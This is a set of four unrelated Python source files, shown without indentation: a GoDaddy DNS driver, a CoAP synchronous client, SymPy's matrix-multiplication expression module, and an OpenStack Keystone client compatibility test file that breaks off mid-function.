class GoDaddyDNSResponse(JsonResponse):
valid_response_codes = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
httplib.NO_CONTENT]
def parse_body(self):
if not self.body:
return None
# json.loads doesn't like the regex expressions used in godaddy schema
self.body = self.body.replace('\\.', '\\\\.')
data = json.loads(self.body)
return data
def parse_error(self):
data = self.parse_body()
raise GoDaddyDNSException(
data['code'], data['message'])
def success(self):
return self.status in self.valid_response_codes
class GoDaddyDNSConnection(ConnectionKey):
responseCls = GoDaddyDNSResponse
host = API_ROOT
allow_insecure = False
def __init__(self, key, secret, shopper_id, secure=True, host=None,
port=None, url=None, timeout=None,
proxy_url=None, backoff=None, retry_delay=None):
super(GoDaddyDNSConnection, self).__init__(
key,
secure=secure, host=host,
port=port, url=url,
timeout=timeout,
proxy_url=proxy_url,
backoff=backoff,
retry_delay=retry_delay)
self.key = key
self.secret = secret
self.shopper_id = shopper_id
def add_default_headers(self, headers):
headers['X-Shopper-Id'] = self.shopper_id
headers['Authorization'] = "sso-key %s:%s" % \
(self.key, self.secret)
return headers
class GoDaddyDNSDriver(DNSDriver):
"""
A driver for GoDaddy DNS.
This is for customers of GoDaddy
who wish to purchase, update existing domains
and manage records for DNS zones owned by GoDaddy NS servers.
"""
type = Provider.GODADDY
name = 'GoDaddy DNS'
website = 'https://www.godaddy.com/'
connectionCls = GoDaddyDNSConnection
RECORD_TYPE_MAP = {
RecordType.A: 'A',
RecordType.AAAA: 'AAAA',
RecordType.CNAME: 'CNAME',
RecordType.MX: 'MX',
RecordType.NS: 'SPF',
RecordType.SRV: 'SRV',
RecordType.TXT: 'TXT',
}
def __init__(self, shopper_id, key, secret,
secure=True, host=None, port=None):
"""
Instantiate a new `GoDaddyDNSDriver`
:param shopper_id: Your customer ID or shopper ID with GoDaddy
:type shopper_id: ``str``
:param key: Your access key from developer.godaddy.com
:type key: ``str``
:param secret: Your access key secret
:type secret: ``str``
"""
super(GoDaddyDNSDriver, self).__init__(key=key, secret=secret,
secure=secure,
host=host, port=port,
shopper_id=str(shopper_id))
def list_zones(self):
"""
Return a list of zones (purchased domains)
:return: ``list`` of :class:`Zone`
"""
result = self.connection.request(
'/v1/domains/').object
zones = self._to_zones(result)
return zones
def list_records(self, zone):
"""
Return a list of records for the provided zone.
:param zone: Zone to list records for.
:type zone: :class:`Zone`
:return: ``list`` of :class:`Record`
"""
result = self.connection.request(
'/v1/domains/%s/records' % (zone.domain)).object
records = self._to_records(items=result, zone=zone)
return records
def create_record(self, name, zone, type, data, extra=None):
"""
Create a new record.
:param name: Record name without the domain name (e.g. www).
Note: If you want to create a record for a base domain
name, you should specify empty string ('') for this
argument.
:type name: ``str``
:param zone: Zone where the requested record is created.
:type zone: :class:`Zone`
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: Extra attributes (driver specific). (optional)
:type extra: ``dict``
:rtype: :class:`Record`
"""
new_record = self._format_record(name, type, data, extra)
self.connection.request(
'/v1/domains/%s/records' % (zone.domain), method='PATCH',
data=[new_record])
id = self._get_id_of_record(name, type)
return Record(
id=id, name=name,
type=type, data=data,
zone=zone, driver=self,
ttl=new_record['ttl'],
extra=extra)
def update_record(self, record, name, type, data, extra=None):
"""
Update an existing record.
:param record: Record to update.
:type record: :class:`Record`
:param name: Record name without the domain name (e.g. www).
Note: If you want to create a record for a base domain
name, you should specify empty string ('') for this
argument.
:type name: ``str``
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: :class:`Record`
"""
new_record = self._format_record(name, type, data, extra)
self.connection.request(
'/v1/domains/%s/records/%s/%s' % (record.zone.domain,
record.type,
record.name),
method='PUT',
data=[new_record])
id = self._get_id_of_record(name, type)
return Record(
id=id, name=name,
type=type, data=data,
zone=record.zone, driver=self,
ttl=new_record['ttl'],
extra=extra)
def get_record(self, zone_id, record_id):
"""
Return a Record instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:param record_id: ID of the required record
:type record_id: ``str``
:rtype: :class:`Record`
"""
parts = record_id.split(':')
result = self.connection.request(
'/v1/domains/%s/records/%s/%s' % (
zone_id,
parts[1],
parts[0])).object
if len(result) == 0:
raise RecordDoesNotExistError(record_id,
driver=self,
record_id=record_id)
return self._to_record(result[0],
self.get_zone(zone_id))
def get_zone(self, zone_id):
"""
Get a zone (by domain)
:param zone_id: The domain, not the ID
:type zone_id: ``str``
:rtype: :class:`Zone`
"""
result = self.connection.request(
'/v1/domains/%s/' % zone_id).object
zone = self._to_zone(result)
return zone
def delete_zone(self, zone):
"""
Delete a zone.
Note: This will CANCEL a purchased domain
:param zone: Zone to delete.
:type zone: :class:`Zone`
:rtype: ``bool``
"""
self.connection.request(
'/v1/domains/%s' % (zone.domain),
method='DELETE')
# no error means ok
return True
def ex_check_availability(self, domain, for_transfer=False):
"""
Check the availability of the domain
:param domain: the domain name e.g. wazzlewobbleflooble.com
:type domain: ``str``
:param for_transfer: Check if domain is available for transfer
:type for_transfer: ``bool``
:rtype: `list` of :class:`GoDaddyAvailability`
"""
result = self.connection.request(
'/v1/domains/available',
method='GET',
params={
'domain': domain,
'forTransfer': str(for_transfer)
}
).object
return GoDaddyAvailability(
domain=result['domain'],
available=result['available'],
price=result['price'],
currency=result['currency'],
period=result['period']
)
def ex_list_tlds(self):
"""
List available TLDs for sale
:rtype: ``list`` of :class:`GoDaddyTLD`
"""
result = self.connection.request(
'/v1/domains/tlds',
method='GET'
).object
return self._to_tlds(result)
def ex_get_purchase_schema(self, tld):
"""
Get the schema that needs completing to purchase a new domain
Use this in conjunction with ex_purchase_domain
:param tld: The top level domain e.g com, eu, uk
:type tld: ``str``
:rtype: `dict` the JSON Schema
"""
result = self.connection.request(
'/v1/domains/purchase/schema/%s' % tld,
method='GET'
).object
return result
def ex_get_agreements(self, tld, privacy=True):
"""
Get the legal agreements for a tld
Use this in conjunction with ex_purchase_domain
:param tld: The top level domain e.g com, eu, uk
:type tld: ``str``
:rtype: `dict` the JSON Schema
"""
result = self.connection.request(
'/v1/domains/agreements',
params={
'tlds': tld,
'privacy': str(privacy)
},
method='GET'
).object
agreements = []
for item in result:
agreements.append(
GoDaddyLegalAgreement(
agreement_key=item['agreementKey'],
title=item['title'],
url=item['url'],
content=item['content']))
return agreements
def ex_purchase_domain(self, purchase_request):
"""
Purchase a domain with GoDaddy
:param purchase_request: The completed document
from ex_get_purchase_schema
:type purchase_request: ``dict``
:rtype: :class:`GoDaddyDomainPurchaseResponse` Your order
"""
result = self.connection.request(
'/v1/domains/purchase',
data=purchase_request,
method='POST'
).object
return GoDaddyDomainPurchaseResponse(
order_id=result['orderId'],
item_count=result['itemCount'],
total=result['total'],
currency=result['currency']
)
def _format_record(self, name, type, data, extra):
if extra is None:
extra = {}
new_record = {}
if type == RecordType.SRV:
new_record = {
'type': type,
'name': name,
'data': data,
'priority': 1,
'ttl': extra.get('ttl', 5),
'service': extra.get('service', ''),
'protocol': extra.get('protocol', ''),
'port': extra.get('port', ''),
'weight': extra.get('weight', '1')
}
else:
new_record = {
'type': type,
'name': name,
'data': data,
'priority': 1,
'ttl': extra.get('ttl', 5)
}
return new_record
def _to_zones(self, items):
zones = []
for item in items:
zones.append(self._to_zone(item))
return zones
def _to_zone(self, item):
extra = {"expires": item['expires']}
zone = Zone(id=item['domainId'], domain=item['domain'],
type='master', ttl=None,
driver=self, extra=extra)
return zone
def _to_records(self, items, zone=None):
records = []
for item in items:
records.append(self._to_record(item=item, zone=zone))
return records
def _to_record(self, item, zone=None):
ttl = item['ttl']
type = self._string_to_record_type(item['type'])
name = item['name']
id = self._get_id_of_record(name, type)
record = Record(id=id, name=name,
type=type, data=item['data'],
zone=zone, driver=self,
ttl=ttl)
return record
def _to_tlds(self, items):
tlds = []
for item in items:
tlds.append(self._to_tld(item))
return tlds
def _to_tld(self, item):
return GoDaddyTLD(
name=item['name'],
tld_type=item['type']
)
def _get_id_of_record(self, name, type):
return '%s:%s' % (name, type)
class GoDaddyAvailability(object):
def __init__(self, domain, available, price, currency, period):
self.domain = domain
self.available = bool(available)
# currency comes in micro-units, convert to dollars.
self.price = float(price) / 1000000
self.currency = currency
self.period = int(period)
class GoDaddyTLD(object):
def __init__(self, name, tld_type):
self.name = name
self.type = tld_type
class GoDaddyDomainPurchaseResponse(object):
def __init__(self, order_id, item_count, total, currency):
self.order_id = order_id
self.item_count = item_count
self.total = total
self.current = currency
class GoDaddyLegalAgreement(object):
def __init__(self, agreement_key, title, url, content):
self.agreement_key = agreement_key
self.title = title
self.url = url
self.content = content
|
|
import random
import re
import socket
import threading
import time
from coapthon.messages.message import Message
from coapthon.messages.response import Response
from coapthon import defines
from coapthon.serializer import Serializer
from coapthon.messages.request import Request
# import logging as log
__author__ = 'giacomo'
class HelperClientSynchronous(object):
def __init__(self, parent=None):
self._currentMID = 100
self.relation = {}
self.received = {}
self.sent = {}
self.sent_token = {}
self.received_token = {}
self.call_id = {}
self._response = None
self.condition = threading.Condition()
self._endpoint = None
self._socket = None
self._receiver_thread = None
self.stop = False
self.parent = parent
@staticmethod
def start(operations):
# self.transport.connect(host, self.server[1])
function, args, kwargs = operations[0]
function(*args, **kwargs)
def send(self, request, endpoint, resend=False):
self._endpoint = endpoint
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._receiver_thread = threading.Thread(target=self.datagram_received)
self._receiver_thread.start()
if not resend:
if request.mid is None:
request.mid = self._currentMID
self._currentMID += 1
key = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(request.mid))
key_token = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(request.token))
self.sent[key] = (request, time.time())
self.sent[key_token] = request
if request.type is None:
request.type = defines.inv_types["CON"]
serializer = Serializer()
request.destination = self._endpoint
# host, port = request.destination
# print "Message sent to " + host + ":" + str(port)
# print "----------------------------------------"
# print request
# print "----------------------------------------"
datagram = serializer.serialize(request)
# log.info("Send datagram")
self._socket.sendto(datagram, self._endpoint)
def schedule_retrasmission(self, request):
host, port = self._endpoint
if request.type == defines.inv_types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
key = hash(str(host) + str(port) + str(request.mid))
self.call_id[key] = (threading.Timer(future_time, self.retransmit, (request, host, port, future_time)), 0)
def retransmit(self, t):
# log.info("Retransmit")
request, host, port, future_time = t
key = hash(str(host) + str(port) + str(request.mid))
call_id, retransmit_count = self.call_id[key]
if retransmit_count < defines.MAX_RETRANSMIT and (not request.acknowledged and not request.rejected):
retransmit_count += 1
self.sent[key] = (request, time.time())
self.send(request, request.destination)
future_time *= 2
self.call_id[key] = (threading.Timer(future_time, self.retransmit,
(request, host, port, future_time)), retransmit_count)
elif request.acknowledged or request.rejected:
request.timeouted = False
del self.call_id[key]
else:
request.timeouted = True
# log.error("Request timeouted")
del self.call_id[key]
# notify timeout
self.condition.acquire()
self.condition.notify()
self.condition.release()
def datagram_received(self):
# TODO mutex
self.stop = False
while not self.stop:
self._socket.settimeout(2 * defines.ACK_TIMEOUT)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout, e:
err = e.args[0]
# this next if/else is a bit redundant, but illustrates how the
# timeout exception is setup
if err == 'timed out':
print 'recv timed out, retry later'
continue
else:
print e
return
except socket.error, e:
# Something else happened, handle error, exit, etc.
print e
return
else:
if len(datagram) == 0:
print 'orderly shutdown on server end'
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
message = serializer.deserialize(datagram, host, port)
# print "Message received from " + host + ":" + str(port)
# print "----------------------------------------"
# print message
# print "----------------------------------------"
if isinstance(message, Response):
self.handle_response(message)
elif isinstance(message, Request):
# log.error("Received request")
pass
else:
self.handle_message(message)
key = hash(str(host) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
# handle separate
print "Separate Response"
self._response = message
self.condition.acquire()
self.condition.notify()
self.condition.release()
else:
# TODO handle notification
self._response = message
self.condition.acquire()
self.condition.notify()
self.condition.release()
if message.observe == 0:
self._receiver_thread = None
self.stop = True
def handle_response(self, response):
if response.type == defines.inv_types["CON"]:
ack = Message.new_ack(response)
self.send(ack, self._endpoint)
key_token = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(response.token))
if key_token in self.sent_token.keys():
self.received_token[key_token] = response
req = self.sent_token[key_token]
key = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(req.mid))
timer, counter = self.call_id[key]
timer.cancel()
self.received[key] = response
self.condition.acquire()
self._response = response
self.condition.notify()
self.condition.release()
def handle_message(self, message):
key = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
return None
if key in self.sent.keys():
self.received[key] = message
if message.type == defines.inv_types["RST"]:
self._response = message
else:
# log.error("Received unattended message")
# handle error
self._response = "Received unattended message"
self.condition.acquire()
self.condition.notify()
self.condition.release()
def parse_path(self, path):
m = re.match("([a-zA-Z]{4,5})://([a-zA-Z0-9.]*):([0-9]*)/(\S*)", path)
if m is None:
m = re.match("([a-zA-Z]{4,5})://([a-zA-Z0-9.]*)/(\S*)", path)
if m is None:
m = re.match("([a-zA-Z]{4,5})://([a-zA-Z0-9.]*)", path)
if m is None:
ip, port, path = self.parse_path_ipv6(path)
else:
ip = m.group(2)
port = 5683
path = ""
else:
ip = m.group(2)
port = 5683
path = m.group(3)
else:
ip = m.group(2)
port = int(m.group(3))
path = m.group(4)
return ip, port, path
def get(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["GET"]
self.send(request, endpoint)
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
retransmit_count = 0
self.condition.acquire()
while True:
self.condition.wait(timeout=future_time)
if self._response is not None:
break
if request.type == defines.inv_types['CON']:
if retransmit_count < defines.MAX_RETRANSMIT and (not request.acknowledged and not request.rejected):
print("retransmit")
retransmit_count += 1
future_time *= 2
self.send(request, endpoint)
else:
print("Give up on message: " + str(request.mid))
self.stop = True
break
message = self._response
self._response = None
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.condition.acquire()
self.condition.wait()
message = self._response
self._response = None
return message
def observe(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["GET"]
request.observe = 0
self.send(request, endpoint)
def notification(self, *args, **kwargs):
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
endpoint = (ip, port)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
def delete(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["DELETE"]
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
def post(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
payload = request.payload
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
payload = kwargs['payload']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["POST"]
request.payload = payload
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
def put(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
payload = request.payload
else:
request = Request()
path = kwargs['path']
payload = kwargs['payload']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["PUT"]
request.payload = payload
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
def discover(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
if path == "":
path = defines.DISCOVERY_URL
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["GET"]
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
@staticmethod
def parse_path_ipv6(path):
m = re.match("([a-zA-Z]{4,5})://\[([a-fA-F0-9:]*)\]:([0-9]*)/(\S*)", path)
if m is None:
m = re.match("([a-zA-Z]{4,5})://\[([a-fA-F0-9:]*)\]/(\S*)", path)
if m is None:
m = re.match("([a-zA-Z]{4,5})://\[([a-fA-F0-9:]*)\]", path)
ip = m.group(2)
port = 5683
path = ""
else:
ip = m.group(2)
port = 5683
path = m.group(3)
else:
ip = m.group(2)
port = int(m.group(3))
path = m.group(4)
return ip, port, path
|
|
from __future__ import print_function, division
from sympy.core import Mul, Basic, sympify, Add
from sympy.core.compatibility import range
from sympy.functions import adjoint
from sympy.matrices.expressions.transpose import transpose
from sympy.strategies import (rm_id, unpack, typed, flatten, exhaust,
do_one, new)
from sympy.matrices.expressions.matexpr import (MatrixExpr, ShapeError,
Identity, ZeroMatrix)
from sympy.matrices.matrices import MatrixBase
class MatMul(MatrixExpr):
"""
A product of matrix expressions
Examples
========
>>> from sympy import MatMul, MatrixSymbol
>>> A = MatrixSymbol('A', 5, 4)
>>> B = MatrixSymbol('B', 4, 3)
>>> C = MatrixSymbol('C', 3, 6)
>>> MatMul(A, B, C)
A*B*C
"""
is_MatMul = True
def __new__(cls, *args, **kwargs):
check = kwargs.get('check', True)
args = list(map(sympify, args))
obj = Basic.__new__(cls, *args)
factor, matrices = obj.as_coeff_matrices()
if check:
validate(*matrices)
return obj
@property
def shape(self):
matrices = [arg for arg in self.args if arg.is_Matrix]
return (matrices[0].rows, matrices[-1].cols)
def _entry(self, i, j, expand=True):
coeff, matrices = self.as_coeff_matrices()
if len(matrices) == 1: # situation like 2*X, matmul is just X
return coeff * matrices[0][i, j]
head, tail = matrices[0], matrices[1:]
if len(tail) == 0:
raise ValueError("lenth of tail cannot be 0")
X = head
Y = MatMul(*tail)
from sympy.core.symbol import Dummy
from sympy.concrete.summations import Sum
from sympy.matrices import ImmutableMatrix
k = Dummy('k', integer=True)
if X.has(ImmutableMatrix) or Y.has(ImmutableMatrix):
return coeff*Add(*[X[i, k]*Y[k, j] for k in range(X.cols)])
result = Sum(coeff*X[i, k]*Y[k, j], (k, 0, X.cols - 1))
return result.doit() if expand else result
def as_coeff_matrices(self):
scalars = [x for x in self.args if not x.is_Matrix]
matrices = [x for x in self.args if x.is_Matrix]
coeff = Mul(*scalars)
return coeff, matrices
def as_coeff_mmul(self):
coeff, matrices = self.as_coeff_matrices()
return coeff, MatMul(*matrices)
def _eval_transpose(self):
return MatMul(*[transpose(arg) for arg in self.args[::-1]]).doit()
def _eval_adjoint(self):
return MatMul(*[adjoint(arg) for arg in self.args[::-1]]).doit()
def _eval_trace(self):
factor, mmul = self.as_coeff_mmul()
if factor != 1:
from .trace import Trace
return factor * Trace(mmul)
else:
raise NotImplementedError("Can't simplify any further")
def _eval_determinant(self):
from sympy.matrices.expressions.determinant import Determinant
factor, matrices = self.as_coeff_matrices()
square_matrices = only_squares(*matrices)
return factor**self.rows * Mul(*list(map(Determinant, square_matrices)))
def _eval_inverse(self):
try:
return MatMul(*[
arg.inverse() if isinstance(arg, MatrixExpr) else arg**-1
for arg in self.args[::-1]]).doit()
except ShapeError:
from sympy.matrices.expressions.inverse import Inverse
return Inverse(self)
def doit(self, **kwargs):
deep = kwargs.get('deep', True)
if deep:
args = [arg.doit(**kwargs) for arg in self.args]
else:
args = self.args
return canonicalize(MatMul(*args))
def validate(*matrices):
""" Checks for valid shapes for args of MatMul """
for i in range(len(matrices)-1):
A, B = matrices[i:i+2]
if A.cols != B.rows:
raise ShapeError("Matrices %s and %s are not aligned"%(A, B))
# Rules
def newmul(*args):
if args[0] == 1:
args = args[1:]
return new(MatMul, *args)
def any_zeros(mul):
if any([arg.is_zero or (arg.is_Matrix and arg.is_ZeroMatrix)
for arg in mul.args]):
matrices = [arg for arg in mul.args if arg.is_Matrix]
return ZeroMatrix(matrices[0].rows, matrices[-1].cols)
return mul
def merge_explicit(matmul):
""" Merge explicit MatrixBase arguments
>>> from sympy import MatrixSymbol, eye, Matrix, MatMul, pprint
>>> from sympy.matrices.expressions.matmul import merge_explicit
>>> A = MatrixSymbol('A', 2, 2)
>>> B = Matrix([[1, 1], [1, 1]])
>>> C = Matrix([[1, 2], [3, 4]])
>>> X = MatMul(A, B, C)
>>> pprint(X)
A*[1 1]*[1 2]
[ ] [ ]
[1 1] [3 4]
>>> pprint(merge_explicit(X))
A*[4 6]
[ ]
[4 6]
>>> X = MatMul(B, A, C)
>>> pprint(X)
[1 1]*A*[1 2]
[ ] [ ]
[1 1] [3 4]
>>> pprint(merge_explicit(X))
[1 1]*A*[1 2]
[ ] [ ]
[1 1] [3 4]
"""
if not any(isinstance(arg, MatrixBase) for arg in matmul.args):
return matmul
newargs = []
last = matmul.args[0]
for arg in matmul.args[1:]:
if isinstance(arg, MatrixBase) and isinstance(last, MatrixBase):
last = last * arg
else:
newargs.append(last)
last = arg
newargs.append(last)
return MatMul(*newargs)
def xxinv(mul):
""" Y * X * X.I -> Y """
factor, matrices = mul.as_coeff_matrices()
for i, (X, Y) in enumerate(zip(matrices[:-1], matrices[1:])):
try:
if X.is_square and Y.is_square and X == Y.inverse():
I = Identity(X.rows)
return newmul(factor, *(matrices[:i] + [I] + matrices[i+2:]))
except ValueError: # Y might not be invertible
pass
return mul
def remove_ids(mul):
""" Remove Identities from a MatMul
This is a modified version of sympy.strategies.rm_id.
This is necesssary because MatMul may contain both MatrixExprs and Exprs
as args.
See Also
--------
sympy.strategies.rm_id
"""
# Separate Exprs from MatrixExprs in args
factor, mmul = mul.as_coeff_mmul()
# Apply standard rm_id for MatMuls
result = rm_id(lambda x: x.is_Identity is True)(mmul)
if result != mmul:
return newmul(factor, *result.args) # Recombine and return
else:
return mul
def factor_in_front(mul):
factor, matrices = mul.as_coeff_matrices()
if factor != 1:
return newmul(factor, *matrices)
return mul
rules = (any_zeros, remove_ids, xxinv, unpack, rm_id(lambda x: x == 1),
merge_explicit, factor_in_front, flatten)
canonicalize = exhaust(typed({MatMul: do_one(*rules)}))
def only_squares(*matrices):
""" factor matrices only if they are square """
if matrices[0].rows != matrices[-1].cols:
raise RuntimeError("Invalid matrices being multiplied")
out = []
start = 0
for i, M in enumerate(matrices):
if M.cols == matrices[start].rows:
out.append(MatMul(*matrices[start:i+1]).doit())
start = i+1
return out
from sympy.assumptions.ask import ask, Q
from sympy.assumptions.refine import handlers_dict
def refine_MatMul(expr, assumptions):
"""
>>> from sympy import MatrixSymbol, Q, assuming, refine
>>> X = MatrixSymbol('X', 2, 2)
>>> expr = X * X.T
>>> print(expr)
X*X'
>>> with assuming(Q.orthogonal(X)):
... print(refine(expr))
I
"""
newargs = []
last = expr.args[0]
for arg in expr.args[1:]:
if arg == last.T and ask(Q.orthogonal(arg), assumptions):
last = Identity(arg.shape[0])
elif arg == last.conjugate() and ask(Q.unitary(arg), assumptions):
last = Identity(arg.shape[0])
else:
newargs.append(last)
last = arg
newargs.append(last)
return MatMul(*newargs)
handlers_dict['MatMul'] = refine_MatMul
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import uuid
import nose.exc
from keystone import test
import default_fixtures
OPENSTACK_REPO = 'https://review.openstack.org/p/openstack'
KEYSTONECLIENT_REPO = '%s/python-keystoneclient.git' % OPENSTACK_REPO
class CompatTestCase(test.TestCase):
def setUp(self):
super(CompatTestCase, self).setUp()
revdir = test.checkout_vendor(*self.get_checkout())
self.add_path(revdir)
self.clear_module('keystoneclient')
self.load_backends()
self.load_fixtures(default_fixtures)
self.public_server = self.serveapp('keystone', name='main')
self.admin_server = self.serveapp('keystone', name='admin')
# TODO(termie): is_admin is being deprecated once the policy stuff
# is all working
# TODO(termie): add an admin user to the fixtures and use that user
# override the fixtures, for now
self.metadata_foobar = self.identity_api.update_metadata(
self.user_foo['id'], self.tenant_bar['id'],
dict(roles=['keystone_admin'], is_admin='1'))
def tearDown(self):
self.public_server.kill()
self.admin_server.kill()
self.public_server = None
self.admin_server = None
super(CompatTestCase, self).tearDown()
def _public_url(self):
public_port = self.public_server.socket_info['socket'][1]
return "http://localhost:%s/v2.0" % public_port
def _admin_url(self):
admin_port = self.admin_server.socket_info['socket'][1]
return "http://localhost:%s/v2.0" % admin_port
def _client(self, admin=False, **kwargs):
from keystoneclient.v2_0 import client as ks_client
url = self._admin_url() if admin else self._public_url()
kc = ks_client.Client(endpoint=url,
auth_url=self._public_url(),
**kwargs)
kc.authenticate()
# have to manually overwrite the management url after authentication
kc.management_url = url
return kc
def get_client(self, user_ref=None, tenant_ref=None, admin=False):
if user_ref is None:
user_ref = self.user_foo
if tenant_ref is None:
for user in default_fixtures.USERS:
if user['id'] == user_ref['id']:
tenant_id = user['tenants'][0]
else:
tenant_id = tenant_ref['id']
return self._client(username=user_ref['name'],
password=user_ref['password'],
tenant_id=tenant_id,
admin=admin)
class KeystoneClientTests(object):
"""Tests for all versions of keystoneclient."""
def test_authenticate_tenant_name_and_tenants(self):
client = self.get_client()
tenants = client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_tenant_id_and_tenants(self):
client = self._client(username=self.user_foo['name'],
password=self.user_foo['password'],
tenant_id='bar')
tenants = client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_invalid_tenant_id(self):
from keystoneclient import exceptions as client_exceptions
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username=self.user_foo['name'],
password=self.user_foo['password'],
tenant_id='baz')
def test_authenticate_token_no_tenant(self):
client = self.get_client()
token = client.auth_token
token_client = self._client(token=token)
tenants = token_client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_token_tenant_id(self):
client = self.get_client()
token = client.auth_token
token_client = self._client(token=token, tenant_id='bar')
tenants = token_client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_token_invalid_tenant_id(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
token = client.auth_token
self.assertRaises(client_exceptions.AuthorizationFailure,
self._client, token=token, tenant_id='baz')
def test_authenticate_token_tenant_name(self):
client = self.get_client()
token = client.auth_token
token_client = self._client(token=token, tenant_name='BAR')
tenants = token_client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_and_delete_token(self):
